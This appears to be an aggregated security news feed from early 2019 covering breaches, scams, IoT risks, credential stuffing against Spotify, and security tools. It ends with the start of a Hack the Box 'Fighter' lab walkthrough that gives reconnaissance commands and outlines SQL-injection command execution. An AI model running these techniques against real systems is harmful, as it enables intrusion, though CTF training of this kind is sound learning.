Note: Each list was developed by examining keyword registration growth relative to the preceding month, such that those keywords with the highest percentage of registration growth are being reported on. This method is used to eliminate commonly registered keywords, such as “online” and “shop,” to provide a true look at monthly trends. In order to be included, a keyword must experience a minimum threshold in registration growth month over month. Qualifying keywords with the highest volume of registrations are then ranked and included in the list.
The post Top 10 Trending Keywords in .Com and .Net Registrations in December appeared first on Verisign Blog.
2019 kicked off with a major security breach in Germany that compromised the personal data of some 1,000 politicians, journalists and celebrities, including Angela Merkel, Green party leader Robert Habeck, TV personality Jan Böhmermann and many others, including rappers and members of the German parliament, writes the BBC. For now, there is no evidence suggesting far-right party AfD members were also targeted.
While authorities initially had no idea who was behind the cyberattack, they brought in a 20-year-old German man for questioning, says The Guardian. At first he denied accusations but confirmed he knew who was behind the Twitter account that caused the breach: @_0rbit located in Hamburg, Germany.
In December, the Twitter account @_0rbit published the stolen data online disguised in a daily advent calendar. The compromised data includes telephone numbers, credit card information, photos, addresses, private conversations and contacts, reported BKA – the German federal criminal police. The account, which had over 17,000 followers, has been suspended.
Shortly after interrogation, the man, identified as Jan S., confessed to the attack, which he claims he carried out “alone and out of annoyance at statements made by the public figures he attacked.” On Twitter he also used the account name “G0d.” BKA says so far there is no evidence that a third-party was involved.
Interior Minister Seehofer told the BBC at the time that the data was accessed through “wrongful use of log-in information for cloud services, email accounts or social networks.” There is no evidence that government systems were hacked.
German newspaper Bild claims the data compromised is as old as October 2018, possibly even older.
Jan S. was released on Monday “due to a lack of grounds for detention.”
If you read this blog regularly you’re no doubt aware that cyber-criminals are a determined bunch, with a large range of tools and tactics at their disposal to rob you of your identity and hard-earned cash. Tech support scams (TSS) are an increasingly popular way for them to do just this. In 2017, Microsoft Customer Support Services received 153,000 reports from customers around the world who encountered or fell victim to these scams, a 24 percent increase on the year previous. Many lost hundreds of dollars in the process.
Yet the real scale of the problem is likely to be many times bigger.
If you’re still unsure what tech support scams are, and how you can protect yourself, this handy guide will tell you everything you need to know.
What types of tech support scam are there?
Tech support scams target users of any devices, platforms and software and can involve a variety of tactics. Typically, they include both an online element and/or a phone call with the scammer, who pretends to be technical support worker for a reputable company like Microsoft or your ISP. They try to trick you into believing there’s something wrong with your computer so that you agree either to hand over money (and credit card details) to ‘fix’ it, and/or allow them remote access to your machine — which enables them to download covert info-stealing malware.
Here are the two main ways a TSS can begin:
The bottom line is that if you fall for one of these tactics, you may lose an initial sum of money by paying the scammer, but also be exposed to further fraud on that card in the future as they’ll have your details on file. You could also be at risk of identity theft if the bad guys have downloaded malware to steal more personal info from your machine, like banking log-ins, Social Security numbers and more.
Microsoft claimed last year that three million users are subject to these scams every month, and more than half (56%) are from the US. The FBI, meanwhile, estimated tech support fraud losses in 2017 amounted to $15 million, an 86 percent increase on the previous year.
How do I stay safe, or recover, from a scam?
Fortunately, there are several things you can do to prevent the scammers getting what they want, and even if you are caught out, some quick thinking can help to minimize the impact on your life and finances.
If you’ve been scammed:
How can Trend Micro help?
For the online side of tech support scams, Trend Micro Security offers comprehensive multi-layered protection from the malicious sites, pop-ups, browser takeovers and malware associated with tech support scams. Here are just some of the techniques we use to keep you safe:
Visit Trend Micro Security to find out more about how TMS protects you, or to buy the product.
The post Tech Support Scams: What are They and How do I Stay Safe? appeared first on .
A manufacturer of kitchen utensils, office supplies and housewares disclosed a data breach of customer information submitted to its e-commerce website. OXO International Ltd confirmed on 17 December 2018 that digital attackers might have compromised the data submitted by customers to its e-commerce website. The manufacturer believes that those responsible for the security incident might […]… Read More
The post Kitchen Utensil Manufacturer Discloses Data Breach of E-commerce Site appeared first on The State of Security.
Undoubtedly, the biggest, boldest and most alluring consumer show on the planet – the annual Consumer Electronics Show (CES) – is happening this week in Las Vegas. And even a non-earthling can hazard an educated guess that every category of device – home, health, transportation, hygiene, fitness, entertainment, sports, etc. – is going to have a few of the same common attributes.
Everything is going to be connected to the Internet, claim to have some form of AI, an app that screams for attention, integration with a smart assistant like Alexa or Google Home, integrations with third-party connected devices and platforms, and claim to make you better, faster, stronger…you get the picture.
First punitive fines handed down to people using VPNs to evade 'Great Firewall of China'
Shoppers who placed an order with discountmugs.com during a four-month period last year are receiving a worrying notification from the online apparel store. Apparently, hackers injected card skimming code into the company’s website, then stole enough customer data to conduct fraud.
In a letter to the state attorney general, the company explains what happened, what information the hackers took, and what the company is doing to remedy this embarrassing situation. From the letter:
“On November 16, 2018, we discovered that an unauthorized change had been made to our DiscountMugs.com website. We immediately initiated an investigation and learned that unauthorized code was inserted into our shopping cart page designed to collect information customers entered on that page. We immediately removed the unauthorized code and reported the matter to law enforcement and to the payment card companies.
By Dec. 20, the company said, its investigation found that “orders placed by credit or debit cards between August 5, 2018 and November 16, 2018, may have been impacted by the unauthorized code. We are providing you with this notice because our records indicate that you placed an order between August 5, 2018 and November 16, 2018.”
This email would undoubtedly alarm any recipient, but the paragraph that follows is even more chilling. It shows the malware siphoned off exactly the data hackers needed to conduct fraud:
“… name, address, phone number, email address, the credit card or debit card number used to place the order, the expiration date, and card security code (CVV2) for that card.”
The paragraph ends by offering some comfort to victims: “Since we do not request PINs when debit cards are used, PINs were not subject to collection.”
But not every card emitter offers the 3D Secure mechanism, and not every e-commerce website uses two-factor-authentication for transactions. Moreover, verifiability of site identity is not 100% bulletproof, because the system involves a pop-up window or inline frame requiring cardholders to enter the one-time password to verify their legitimacy. However, a hacked website might display a fraudulent pop-up designed to harvest passwords.
After learning of the breach, DiscountMugs launched an investigation and, with the help of an unnamed cybersecurity firm, removed the malicious code. It is now helping police and card issuers with their investigations into the breach. Affected customers are offered a reassuring “we do not have any evidence that your information has been misused,” but the company still advises them to review an enclosed document with further information and steps they can take to prevent any harm done. The shop is also offering a complementary year of identity monitoring through AllClear ID.
DiscountMugs fails to mention how many customers were impacted. According to TechCrunch, the shop ranks in the top 10,000 sites in the U.S., with a daily customer count in the thousands.
I wrote my first post on 8 January 2003 while working as an incident response consultant for Foundstone.
Here are a few statistics on the blog. Blogger started providing statistics in May 2010, so these apply to roughly the past 9 years only.
As of today, since May 2010 the blog has nearly 9.4 million all time page views, up from 7.7 million a year ago.
Here are the most popular posts of the last 9 years, as of today:
I'm blogging a bit more recently, with 22 posts in 2018 -- more than my total for 2016 and 2017 combined, but still not half as much as 2015, which saw 55 posts.
Twitter continues to play a role in the way I communicate. Last year @taosecurity had nearly 49,000 followers with less than 18,000 Tweets. Today I have nearly 53,000 followers with 19,000 Tweets.
My rule is generally this: if I start wondering how to fit an idea in 280 characters on Twitter, then a blog post is a better idea. If I start a Twitter "thread," then I really need to write a blog post!
I continue to blog about martial arts and related topics at Rejoining the Tao, which incidentally will be three years old later this month, and is currently 11 posts shy of 100. You can see that during my burnout period I shifted my writing and creativity outside of security.
Thank you to everyone who has been part of this blog's journey since 2003!
It’s no secret – IoT devices are creeping into every facet of our daily lives. In fact, Gartner estimates there will be 20.4 Billion IoT devices by the year 2020. More devices mean greater connectivity and ease of use for their owners, but connectivity also means more opportunities for hacks. With CES 2019 kicking off this week, we turn our focus toward the year ahead, and take a look at some of the IoT devices that are particularly high-profile targets for cybercriminals: gaming systems, voice tech, routers, and smart cars.
Routers are very susceptible to attacks as they often come with factory-set passwords that many owners are unaware of or don’t know how to change, making these devices easy targets for hackers. That’s bad news, since a router is the central hub in a connected home. If a router is compromised and all of the devices share the same Wi-Fi network, then they could potentially all be exposed to an attack. How? When an IoT device talks to its connected router, the device could expose many of its internal mechanisms to the internet. If the device does not require re-authentication, hackers can easily scan for devices that have poorly implemented protocols. Then with that information, cybercriminals can exploit manufacturer missteps to execute their attacks. To help protect your router (and thus all your other devices), a best practice is to consider one with a layer of protection built-in, and be sure to use a long and complex password for your Wi-Fi network.
Over ten years ago, researchers found that many video gaming consoles were being distributed with major security issues involved with the Universal Plug and Play protocol (UPnP), a feature that allows IoT devices on a network to see each other and interact with one another. However, not much has been done to solve the problem. Through exploiting the UPnP weaknesses in gaming systems to reroute traffic over and over again, cybercriminals have been able to create “multi-purpose proxy botnets,” which they can use for a variety of purposes. This is just the jumping-off point for malicious behavior by bad actors. With this sort of access into a gaming system, they can execute DDoS attacks, malware distribution, spamming, phishing, account takeovers, click fraud, and credit card theft. Our recent gaming survey found that 64% of respondents either have or know someone who has been directly affected by a cyberattack, which is an astonishing uptick in attacks on gamers. Considering this shift, follow our tips in the section above for routers and Wi-Fi, never use the same password twice, and be weary of what you click on.
In 2018, 47.3 million adults had access to smart speakers or voice assistants, making them one of the most popular connected devices for the home. Voice-first devices can be vulnerable largely due to what we enable them to be connected with for convenience; delivery, shopping, and transportation services that leverage our credit cards. While it’s important to note that voice-first devices are most often compromised within the home by people who have regular access to your devices (such as kids) when voice recognition is not properly configured, any digital device can be vulnerable to outside attacks too if proper security is not set up. For example, these always-on, always-listening devices could be infiltrated by cybercriminals through a technique called “voice squatting.” By creating “malicious skills,” hackers have been able to trick voice assistants into continuing to listen after a user finishes speaking. In this scenario an unsuspecting person might think they’re connecting to their bank through their voice device, when unbeknownst to them, they’re giving away their personal information. Because voice-controlled devices are frequently distributed without proper security protocol in place, they are the perfect vehicle in terms of executing a cyberattack on an unsuspecting consumer. To protect your voice assistants, make sure your Wi-Fi password is strong, and be on the lookout for suspicious activity on linked accounts.
While you can’t predict the future of IoT attacks, here are some additional tips and best practices on how to stay ahead of hackers trying to ruin your year:
- Keep your security software up-to-date. Software and firmware patches are always being released by companies and are made to combat newly discovered vulnerabilities, so be sure to update every time you’re prompted to.
- Pay attention to the news. With more and more information coming out around vulnerabilities and flaws, companies are more frequently sending out updates for smart cars and other IoT devices. While these should come to you automatically, be sure to pay attention to what is going on in the space of IoT security.
- Change your device’s factory security settings. This is the single most important step to take to protect all devices. When it comes to products, many manufacturers aren’t thinking “security first.” A device may be vulnerable as soon as opening the box. By changing the factory settings you’re instantly upgrading your device’s security.
- Use best practices for linked accounts. For gaming systems and voice-first devices in particular, if you connect a service that leverages a credit card, protect that linked service account with strong passwords and two-factor authentication (2FA) where possible. In addition, pay attention to notification emails, especially those regarding new orders for goods or services. If you notice suspicious activity, act accordingly.
- Setup a separate IoT network. Consider setting up a second network for your IoT devices that don’t share access to your other devices and data. Check your router manufacturer’s website to learn how. You might also consider adding in another network for guests and unsecured devices from others. Lastly, consider getting a router with built-in security features to make it easier to protect all the devices in your home from one place.
- Use a firewall. A firewall is a tool that monitors traffic between an Internet connection and devices to detect unusual or suspicious behavior. Even if a device is infected, a firewall can keep a potential attacker from accessing all the other devices on the same network. When looking for a comprehensive security solution, see if a Firewall is included to ensure that your devices are protected.
- Up your gaming security. Just announced at CES 2019, we’re bringing a sense of security to the virtual world of video games. Get in on the action with McAfee Gamer Security, Beta, it’s free!
Kwikset has quite a few smart entry lock brands under its umbrella, including the Kevo, SmartCode, Obsidian, and Convert series. Today we can add two more brands to the list: Halo, Kwikset’s first Wi-Fi connected smart lock, and Aura, an all-new Bluetooth lock.
Halo is aimed at consumers looking for a simple connected lock that doesn’t require a smart home hub or bridge. Using Wi-Fi enables the Halo to connect directly to the consumer’s router, at which point they can control it with a new smartphone app or integrate it into a broader smart home system.
Google forced to pull even more malware filled apps from the Play Store
A report coming from the security company called Sophos claims that Google managed to remove 22 apps from the Google Play Store that included backdoor malware. Unsuspecting users who downloaded the apps unleashed a plethora of problems onto their devices and created backdoors for hackers to then secretly download files from their own servers.
En.Softonic.com reported that the issues for users who downloaded any of these 22 apps grey more severe.
The apps click on fraudulent ads and drain battery power in the process. They also continue to run in the background, even after they’ve been closed, draining both battery power and mobile data. Although the apps have been removed from the Play Store, there is a chance some users still have the apps on their phones. Below is a full list of the apps:
The problematic apps
Sparkle FlashLight, Snake Attack, Math Solver, ShapeSorter, Tak A Trip, Magnifeye, Join Up, Zombie Killer, Space Rocket, Neon Pong, Just Flashlight, Table Soccer, Cliff Diver, Box Stack, Jelly Slice, AK Blackjack, Color Tiles, Animal Match, Roulette Mania, HexaFall, HexaBlocks and PairZap.
If you have any of these apps on your phone, delete them right away.
In this episode of The Security Ledger podcast (#128): you're going to hear a lot from the annual Consumer Electronics Show (CES) out in Las Vegas this week, but are any of the new gadgets being released secure? And do security and privacy have a seat at the table at the world's largest electronics event? We sit down with IoT luminary and...
New and tested training courses cover every angle
Promo As data thieves and hackers become more numerous, more inventive and more destructive, learning to protect themselves against cybercrime is ever higher on the list of companies' priorities.…
As the new year begins and business leaders refine their 2019 plans, how to effectively deploy technology increasingly will be a focal point of conversations in the boardroom and elsewhere throughout the enterprise. While trending technologies such as artificial intelligence, blockchain and 5G wireless networks command much of the mindshare in the new year, one technology that might no longer be deemed buzzworthy should nonetheless be a major consideration in 2019 for the C-suite and security teams alike – how to derive value while mitigating risk from big data.
The term “big data” has been in circulation for many years, but big data continues to evolve in scope and capability, especially with AI, augmented analytics and other emerging technologies enabling data to be harnessed in more sophisticated fashion. ISACA’s 2018 Digital Transformation Barometer shows that big data remains the technology most capable of delivering organizations transformative value, and it is easy to see why. The positive potential of big data is enormous, spanning virtually all industries and impacting both the public and private sectors. Of critical importance, organizations can tap into big data sets to better understand their customers and configure predictive models that allow them to be more strategic and proactive in their business planning.
Higher Education networks have become incredibly complex. Long gone are the days where students connected desktop computers to ethernet cables in their dorm rooms for internet. Now students can access the school’s wireless network at anytime from anywhere and often bring four or more devices with them on campus. Expecting to use their smartphones and gaming consoles for both school related and personal matters, they rely on constant internet connectivity.
While the latest technology streamlines processes and makes the learning experience more efficient, higher education institutions’ networks have not kept up with technology and cyber security requirements. Network security threats have become more common, and according to a recent Infoblox study, 81 percent of IT professionals state securing campus networks has become more challenging in the last two years.
Nevertheless, outside threats aren’t posing the biggest challenges, internal threats are.
More devices, more malware
IT administrators at universities have seen a surge in the number of devices connected to company networks, making the network more vulnerable to cyberattacks. Innovation in personal technology has played a large role in this. Students are bringing a surplus of devices with them to school beyond laptops like smartphones and tablets. For example, an Infoblox study found that students now use tablets (61%), smartwatches (27%) and gaming consoles (25%) on campus.
This spike in devices directly impacts universities network activity. Where a few years ago IT administrators only had to worry about managing the school’s devices, and potentially student and faculty laptops, that is no longer the case. The survey found that 60 percent of faculty, students and IT professionals use four or more devices on the campus network. This has made managing network activity incredibly complex, and has increased the risk of cyberthreat. Devices that are not native to the university network often do not maintain the same security standards that IT administrators are accustomed to.
Outdated security best practices
IT improvements have not been able to keep pace with the rate at which network activity is changing, making their networks an easy target for hackers and DDoS attacks. When devices using the university network are not properly secured, hackers can take advantage of this by breaking into the device, accessing the network and wreaking havoc that can cost universities millions of dollars.
For example, Infoblox’s survey found that 60 percent of faculty haven’t made network security changes in two years. In addition to not making updates to security best practices, 57 percent use outdated security measures like only updating passwords as a security precaution. Poor security practices also make it easier for hackers to compromise network infrastructure and access sensitive information.
A complex cybersecurity strategy that involves network protection can help to combat these types of attacks, but only 52 percent of current network management solutions have DNS provisioning capabilities and can provide remote network access control. This technique plays a critical role in identifying unusual activity on the network.
Lack of security awareness
Additionally, college students and faculty alike are not up to speed with the latest cybersecurity best practices and often make poor decisions that ultimately compromise network security. Thirty nine percent of IT administrators say users aren’t educated enough on security risks, which makes managing the network more challenging. Students are also unaware of the risks IoT devices can pose to the overall health of the network and don’t have the security knowledge to understand the nuances. For example, 54 percent of IT administrators say at least 25 percent of student’s devices come onto campus already infected with malware.
College students are known to be reckless when it comes to partying, but it appears this mindsight has also influenced their approach to cybersecurity. Infoblox’s survey also found that one in three college students have heard of other students implementing malware or making malicious attacks on the school’s network. Students clearly have little regard for how their network usage can impact the network, making the job of the IT administrator extremely difficult.
For better network security at higher education institutions, change needs to begin from within. The IT department needs to implement a next level network security strategy that can thwart the ongoing threat of DDoS attacks. Students and faculty need to be educated on security best practices when using devices on the university network. In the age of the Internet of Things, the number of internet connected devices connecting to the campus network will only increase, and the network needs to be fortified to support this influx from both a performance and security standpoint.
About the author: Victor Danevich is the CTO of Infoblox where he helps customers achieve Next Level Networking via hyper-scalability, implementing automation, and improving network availability with solutions that are built with security from the core.Copyright 2010 Respective Author at Infosec Island
Case not linked to international spying, reckon sources. Hmmm
German police say a 20-year-old German man has "confessed" to leaks in connection what the country's media is calling "the Hacker Attack", a years-long data exfiltration campaign against politicians and other public figures.…
Unauthorized access to sensitive data, also known as sensitive data leakage, is a pervasive problem affecting even those brands that are widely recognized as having some of the world’s most mature software security initiatives, including Instagram and Amazon. Sensitive data can include financial data such as bank account information, personally identifiable information (PII), and protected health information (i.e., information that can be linked to a specific individual relating to their health status, provision, or payment).
If an organization suffers a sensitive data breach, they’re expected to notify authorities to disclose the breach. For example, per GDPR, the breached firm is expected to disclose the breach within 72 hours of discovery. Such an incident can result in damage to the brand, marred customer trust leading to lost business, regulatory penalties, and the organization funding the investigation into how the leak happened. Data breaches may even lead to lawsuits. As you can see, such an incident could be incredibly detrimental to the future of an organization. There are a variety of regulations in place globally that emphasize the importance of protecting data that is sensitive in nature. So, why then are we still seeing this issue persist?
While we tend to only hear about the massive brands suffering a breach in the news, it’s not only these giant enterprises that are at risk. In fact, small- and medium-sized firms are equally, if not more, susceptible to sensitive data leakage concerns. While the payoff for an attacker isn’t as grand, smaller companies are less likely to have strategies in place to detect, prevent, and mitigate vulnerabilities leading to a breach.
To avoid a sensitive data leak leading to a breach, firms of all sizes need to pay attention to cyber security. Firms often build their own applications, and almost always rely on pre-existing applications to run their business.
If you build your own applications, test them extensively for security. With interactive application security testing (IAST), you can perform application security testing during functional testing. You don’t really need to hire experts to perform vulnerability assessment when you have IAST.
IAST solutions help organizations identify and manage security risks associated with vulnerabilities discovered in running web applications using dynamic testing (a.k.a., runtime testing) techniques. IAST works through software instrumentation, or the use of instruments to monitor an application as it runs and gather information about what it does and how it performs.
Considering that 84 percent of all cyber-attacks are happening in the application layer, take an inventory of the data relating to your organization’s applications. Develop policies around it. For instance, consider how long to keep the data, the type of data you’re storing, and who requires access to that data. Don’t store data you don’t need as a business. Keep information only as long as necessary. Enforce data retention policies. Put authorization and access controls in place around that data. Protect passwords properly. And, train employees on how to handle this data.
While it’s simple to recommend that firms should be taking an inventory of the data being processed by organizational applications, that is, in reality, a massive undertaking. Where do you even start?
IAST not only identifies vulnerabilities, but verifies them as well. When working with traditional application security testing tools, high false positive rate is a common problem. IAST technology’s verification engine helps firms understand which vulnerabilities to resolve first and minimizes false positives.
Sensitive data in web applications can be monitored through IAST, thus providing a solution to the data leakage problem. IAST monitors web application behavior, including code, memory, and data flow to determine where sensitive data is going, whether it’s being written in a file in an unprotected manner, if it’s exposed in the URL, and if proper encryption is being used. If sensitive data isn’t being handled properly, the IAST tool will flag the instance. There is no manual searching for sensitive data. IAST tooling intelligence detects it on behalf of the application owner—who can also alter the rules to fine tune their goals.
It’s also important to note that applications are built from many components: third party components, proprietary code, and open source components. Think of it like Legos. Any one (or more) of the pieces could be vulnerable. This is why, when testing your applications, it’s critical to fully test all three of these areas.
And we can’t forget implications relating to increasing cloud popularity. With the growing adoption of cloud, more and more sensitive data is being stored out of network perimeters. This increases the risk as well as the attack surface. Also increasing are the regulatory pressures and the need to deliver more with fewer resources in the shortest time possible. Under these circumstances, IAST is the most optimal way to test for application security, sensitive data leakage, and prevent breaches.
About the author: Asma Zubair is the Sr. Manager, IAST Product Management at Synopsys. As a seasoned security product management leader, she has also lead teams at WhiteHat Security, The Find (Facebook) and Yahoo!Copyright 2010 Respective Author at Infosec Island
See the different ways France is taking to make a significant step forward with AI.
More RSS Feed: newsroom.cisco.com/rss-feeds ...
ReaQta-Hive is an Endpoint Threat Response and Hunting platform that uses A.I. to detect new types of attacks. A live hypervisor, called the NanoOS, collects detailed security information at the lowest possible level of an endpoint, which Hive uses to perform dynamic behavioral analysis. This analysis is automatic and constructs a comprehensive storyline of an attack. The end result is an intuitive report of all the actions carried out by an attacker, including a summary of the meta-behaviors that highlight key components of the attack. ReaQta-Hive is a vector-agnostic platform, so it can analyze the behavior of any type of attack, whether it is file-less, script-based, exploit driven, or a plain executable file. We are happy to use our software and expertise to contribute actively to the VirusTotal community, and to help analysts worldwide be more effective and efficient.
To view the ReaQta report when viewing a file analysis, click on the Behaviour tab, select ReaQta-Hive, then the detailed report.
XSL document / #squiblytwo
In the relationships tab you can see a link to VT Graph where you we can see some relationships to other domains and URLs VirusTotal has seen before.
Malicious document using LOLBins
Windows PE file, detecting behaviors like key-logging/screenshots
MS Word document, executing powershell with emotet infection
Malicious Document dynamic impersonation, then drops keyloggerTake a look at the ReaQta detailed behaviour report linked from the VT page at:
|Within the process tree, you'll notice the process-hollowing (dynamic process impersonation) icon:|
This also shows up in the "INJECTED PROCESSES" section of the report:
In the VT Graph we can see the relationship to the DDNS host and keylogger that is dropped.
Windows Scriptlet (SCT) file
In the file https://www.virustotal.com/#/file/f128a63c107c3006ebf448d6ec743d11eb491ecb508e4ce63ba084f9792c25da/details we see a scriptlet file dropping a miner.
Have a look yourself by checking out the behaviour tab:
Address Space Layout Randomization (ASLR) is a memory-protection process for operating systems that guards against buffer-overflow attacks. It helps to ensure that the memory addresses associated with running processes on systems are not predictable, thus flaws or vulnerabilities associated with these processes will be more difficult to exploit.
ASLR is used today on Linux, Windows, and MacOS systems. It was first implemented on Linux in 2005. In 2007, the technique was deployed on Microsoft Windows and MacOS. While ASLR provides the same function on each of these operating systems, it is implemented differently on each one.
The effectiveness of ASLR is dependent on the entirety of the address space layout remaining unknown to the attacker. In addition, only executables that are compiled as Position Independent Executable (PIE) programs will be able to claim the maximum protection from ASLR technique because all sections of the code will be loaded at random locations. PIE machine code will execute properly regardless of its absolute address.
In case there are some blank entries in your laundry list of New Year’s resolutions, we have a few tips for a bit of cybersecurity ‘soul searching’. Here’s the first batch, looking at how you can fix your good ol’ passwords.
The post New Year’s resolutions: Get your passwords shipshape appeared first on WeLiveSecurity
Time and time again, I get emails and DMs from people that effectively boil down to this:
Hey, that paste that just appeared in Have I Been Pwned is from Spotify, looks like they've had a data breach
Many years ago, I introduced the concept of pastes to HIBP and what they essentially boil down to is monitoring Pastebin and a bunch of other services for when a trove of email addresses is dumped online. Very often, those addresses are accompanied by other personal information such as passwords. When an HIBP subscriber's address appears in one of these incidents, they get an automated notification and often, it seems, they then reach out to me.
Here's a perfect example of what I'm talking about, this one eventually triggering an email to me just last week:
Let's imagine you're the first person on the list; you get a notification from HIBP, you check out the paste and see your Hotmail account listed there alongside your Spotify password and the plan you're subscribed to. Clearly a Spotify breach, right?
No, and the passwords are the very first thing that starts to give it all away. Just looking at them, they're obviously terrible, but plugging the first one into Pwned Passwords give you a sense of just how terrible it is:
They may not all be that bad (the next one in the list has only been seen twice), but the point is that it's a password that's clearly been seen before and were I to dig back into the source data, there's a good chance it's been seen in a breach alongside that email address too. Then there's the fact that the password is in plain text and I don't know precisely how Spotify store their passwords, but it'd be a very safe bet that by now it's a decent modern-day hashing algorithm. If they had a breach then yes, hashes may be cracked, but that's not what's happening here.
We're simply seeing the successful result of credential stuffing attacks. Regular readers will appreciate the mechanics of this already but all those who I point here for whom this is new, this attack simply takes exposed credentials from a data breach and tries them on another site. The attack is simple but effective due to the prevalence of password reuse. If you were using the same password on LinkedIn when they had their data breach as you are on Spotify today and someone grabbed that password from the breach and tried it on Spotify, you can see the problem. That's it, job done, they're into your account.
Spotify "breaches" like this are enormously common. I just went and looked at the pastes HIBP has collected since the clock ticked over to 2019 and found 20 of them already:
Digging further, I found over a thousand pastes with "Spotify" in the title. These are often removed by Pastebin pretty quickly but looking through some that remain, it's precisely the same pattern as the earlier example. I grabbed a random email address out of one of them and checked it on HIBP:
The same address appears over and over in pastes and each time, the same password appears alongside it. Picking one from the list above that hasn't yet been removed shows a page full of examples like this (with a password Pwned Passwords has seen 4 times before):
This one is interesting for a couple of reasons and the first is the use of the term "combo". I've written about combo lists before and they're essentially combinations of email addresses and passwords used to test against services in credential stuffing attacks. Thousands. Millions. Billions of them, in some cases. The second interesting observation in that image is the "Spotify Cracker" reference. The first Google result for the term shows a popular cracking forum with the following image (password seen 447 times in Pwned Passwords):
This is a tool for breaking into Spotify accounts I wouldn't normally link through to content of that type, but context is important. For people wondering why they're getting alerts from HIBP because their Spotify account is in a paste somewhere, have a flick through some of those pages. 61 of them at the time of writing, each with 20 posts thanking the OP for their work in order to get access to the tool. So what does it do? Have a quick watch of this:
It's a slightly different piece of software based on what's visible, but the objective is the same and the premise is simple: download the tool, pass in the combo list then let it run. Credentials from the list are then tested against Spotify (yes, security friends, there's a very good question to be asked here as to why this is still possible...) and results appear on the screen.
Now, this isn't to say that someone who finds their Spotify account on one of these lists shouldn't worry because it wasn't a breach per se. Instead, they need to look inwardly and adjust their own security practices instead. Get a password manager (8 years on and I still use 1Password every day), create strong and unique passwords on every account and enable 2-factor authentication where available. Well, except that there's still no 2FA support on Spotify so just enable it on every other service that supports it (and most big ones do these days).
And why would someone "hack" (I use the term loosely because they literally logged in with the correct username and password) Spotify accounts? The obvious answer is that they have a monetary value, but I also posit that it's very often just curiosity driving this behaviour. Take a look at a video such as this SQL injection tutorial; I've used it in talks before to illustrate the randomness of attacks as well as the sophistication of those behind many of them. Is the person in this video an evil cyber hacker hell-bent on causing chaos, or just a curious kid whose moral compass is yet to be properly calibrated? That may not make Spotify users feel any better about the end result, but it's important context for this post.
In doing a bit of searching for this piece I found heaps of results for "spotify data breach" that led to discussions highlighting what I've covered above. For example, this one from August on the Spotify community site where the original post begins with:
Someone had access to my pasword [sic] (which is totally unbreakable and diferent [sic] from the one i use in other accounts)
I don't know what their password was, but I do know that I've had dozens of discussions with people making precisely the same claims only to discover "their" password is in Pwned Passwords a few hundred times! Or they entered it into a phishing site somewhere. If we apply Occam's Razor to this (the simplest solution is the most likely one), the password was compromised. I want to illustrate this point via the following Tweet:
For ref, here are the details on my 1Password entry for Pinterest. Definitely the strong, unique one I showed in my tweet. pic.twitter.com/d3sSR8PCu1— Scott Helme (@Scott_Helme) December 9, 2017
This is Scott Helme, a world-renowned security researcher who understands these concepts as well as anyone I can imagine. This tweet is part of a broader discussion where his Pinterest account was logged into by an unknown party and per the image above, Scott was convinced his password was both strong and unique. A couple of hours later, Scott's view is, well, somewhat "different":
Just goes to show, it's sometimes easy to miss these things! I'm now wondering how many other old accounts I have lurking around out there... 🤔 5/5— Scott Helme (@Scott_Helme) December 10, 2017
I spoke to Scott about this incident again whilst writing this post and we both reflected on just how easy it is to have issues like this, even you're convinced your security is spot on. It's precedents like this which cause me to pause and question every strongly made claim of personal security prowess in the wake of examples such as the Spotify community one above.
Reading through that thread only reinforces the view that this was a simple account takeover issue and not a sophisticated hack. For example, this comment:
It's such a shame to see Spotify blaming its users for getting hacked instead of fixing the problem. Got my playlists deleted and the hacker created a playlist called "Get Hacked".
Imagine you're a hacker - a real one with the capabilities to break into a company with hundreds of millions of users and worth billions of dollars - what are you going to do? Are you just going to mess with people's playlists "for the lulz"? No, at the very least you're going to cash in on their public bug bounty or if you're really the malicious type, you're going to monetise their users in a much more surreptitious fashion.
Scroll down a little further and someone is referencing HIBP as "proof" of a hack. Here's what happened to the guy's account:
I got a notification from haveibeenpwned.com and did nothing about it until some random kept playing weird music on a device I did not recognize while I was trying to listen on my normal device. It was annoying, I kept getting pulled out of my song because we started battling for control of what device and what song the audio was to be heard on. I started playing really loud and obnoxious noise music for the hacker while I changed my password.
Now again, let's apply Occam's Razor: is this an elite hacker who's discovered some previously unknown zero-day vulnerability, or someone who's exploited the victim's password and then simply has a different taste in music?
The community thread references a paste titled "Más de 300 cuentas premium de Spotify" ("More than 300 Spotify premium accounts") which has since been deleted from Pastebin (and HIBP doesn't save the contents beyond just the email addresses). But 4 days earlier there was a paste titled "Más de 50 cuentas premium de spotify" which still stands today and its content lines up very closely with the others discussed above; it's simply the output of another automated tool exploiting weak credentials.
I'll end on one final point because if I don't, it'll come through in the comments anyway: online security is a shared responsibility. Some people are quick to play the "victim blaming" card when I write about incidents that can be traced back to weak security practices. Clearly, that's not causing me to sugar-coat the root cause of these incidents but that said (and I touched on this earlier), this is prevalent enough that Spotify also needs to look internally at why this is still occurring. Their job is to stop this form of attack at the platform level and our job as users of the service is to protect our accounts via some basic security practices.
So no, Spotify wasn't hacked, they just allowed malicious parties to log in with other people's poor passwords.
Today we are going to solve another CTF challenge “Fighter”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Fighter is 10.10.10.72
- Network scanning (Nmap)
- Browsing IP address through HTTP
- Adding Domain name to /etc/hosts
- Bruteforcing subdomains
- Adding new domain name to /etc/hosts
- RCE using SQL injection
- Upgrading shell to meterpreter session
- Finding vulnerable service
- Editing Exploit to bypass OS check
- Finding root.exe
- Reversing program to find the password
- Creating a C-program to find the password
- Getting root flag
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sV -sC -T4 10.10.10.72
The Nmap output shows us that there is only 1 port open: 80(HTTP)
We find that port 80 is running http, so we open the IP in our browser.
In the homepage we find a Domain name “streetfighterclub.htb”. We add the domain to our /etc/hosts file.
We don’t find anything new on the webpage, but further looking into the webpage we find that there might be subdomains available that will give us more clues. We intercept the request and send it to intruder. We select where we want to brute force the request.
We select the wordlist, we use namelist.txt located in /usr/share/dnsrecon/.
After bruteforcing we find a subdomain called “members.streetfighterclub.htb” that gave HTTP code 403.
We add the subdomain in /etc/hosts so that we can access the web site.
We open the webpage and got a 403 Forbidden error.
We now run dirb scan on the members.streetfighter.htb and find a directory called “old”.
We then find webpages inside that directory. As we know that it is IIS server we find “asp” files on the web server and find a page called “login.asp”.
dirb http://members.streetfighterclub.htb/old -x .asp
We open the web page and find a login page.
We enumerate the webpage and find that the web application is vulnerable to SQL injection. We find username, password and e-mail but were unable to login. So we tried command injection using SQL injection. We referred this link.
